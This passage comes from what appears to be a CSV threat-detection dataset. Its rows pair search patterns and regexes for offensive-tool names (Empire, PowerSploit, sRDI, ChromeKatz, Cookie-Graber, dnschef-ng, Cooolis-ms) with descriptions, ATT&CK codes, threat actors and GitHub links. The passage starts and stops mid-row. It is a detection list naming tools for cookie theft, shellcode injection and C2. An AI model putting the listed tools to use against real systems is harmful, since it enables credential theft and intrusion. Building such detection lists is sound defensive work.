for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Convert-NT4toCanonical*",".{0,1000}Convert\-NT4toCanonical.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*ConvertTo-LogonHoursArray*",".{0,1000}ConvertTo\-LogonHoursArray.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ConvertTo-Rc4ByteStream*",".{0,1000}ConvertTo\-Rc4ByteStream.{0,1000}","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*ConvertTo-ROT13.ps1*",".{0,1000}ConvertTo\-ROT13\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*ConvertTo-Shellcode -*",".{0,1000}ConvertTo\-Shellcode\s\-.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*ConvertToShellcode*",".{0,1000}ConvertToShellcode.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*ConvertTo-Shellcode.*",".{0,1000}ConvertTo\-Shellcode\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*ConvertTo-Shellcode.ps1*",".{0,1000}ConvertTo\-Shellcode\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ConvertToShellcode.py*",".{0,1000}ConvertToShellcode\.py.{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*cookie_graber_x64.o*",".{0,1000}cookie_graber_x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cookie-graber.c*",".{0,1000}cookie\-graber\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cookie-graber_x64.exe*",".{0,1000}cookie\-graber_x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*Cookie-Graber-BOF*",".{0,1000}Cookie\-Graber\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cookie-katz chrome *",".{0,1000}cookie\-katz\schrome\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*cookie-katz chrome *",".{0,1000}cookie\-katz\schrome\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*cookie-katz edge *",".{0,1000}cookie\-katz\sedge\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatz Minidump parser*",".{0,1000}CookieKatz\sMinidump\sparser.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatz Minidump parser*",".{0,1000}CookieKatz\sMinidump\sparser.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*cookie-katz webview *",".{0,1000}cookie\-katz\swebview\s.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatz.exe*",".{0,1000}CookieKatz\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzBOF.cpp*",".{0,1000}CookieKatzBOF\.cpp.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzBOF.x64*",".{0,1000}CookieKatzBOF\.x64.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzBOF.zip*",".{0,1000}CookieKatzBOF\.zip.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieKatzMinidump.exe*",".{0,1000}CookieKatzMinidump\.exe.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","1","N/A","10","4","318","28","2024-04-23T18:29:17Z","2023-12-07T22:27:06Z" "*CookieProcessor.exe*",".{0,1000}CookieProcessor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","146","16","2024-04-29T19:08:52Z","2023-05-28T18:30:02Z" "*cooking A replies to point to * matching: *",".{0,1000}cooking\sA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking AAAA replies to point to * matching: *",".{0,1000}cooking\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all A replies to point to *",".{0,1000}cooking\sall\sA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all AAAA replies to point to *",".{0,1000}cooking\sall\sAAAA\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all CNAME replies to point to *",".{0,1000}cooking\sall\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all MX replies to point to *",".{0,1000}cooking\sall\sMX\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking all NS replies to point to *",".{0,1000}cooking\sall\sNS\sreplies\sto\spoint\sto\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking CNAME replies to point to * matching: *",".{0,1000}cooking\sCNAME\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking MX replies to point to * matching: *",".{0,1000}cooking\sMX\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cooking NS replies to point to * matching: *",".{0,1000}cooking\sNS\sreplies\sto\spoint\sto\s.{0,1000}\smatching\:\s.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*cool*/cool.zip*",".{0,1000}cool.{0,1000}\/cool\.zip.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*CoolerVoid/0d1n*",".{0,1000}CoolerVoid\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*coolv0.1.exe*",".{0,1000}coolv0\.1\.exe.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*Cooolis*shellcode*",".{0,1000}Cooolis.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CooolisAdjustTokenPrivileges*",".{0,1000}CooolisAdjustTokenPrivileges.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CooolisCreateRemoteThread*",".{0,1000}CooolisCreateRemoteThread.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*Cooolis-ExternalC2*",".{0,1000}Cooolis\-ExternalC2.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 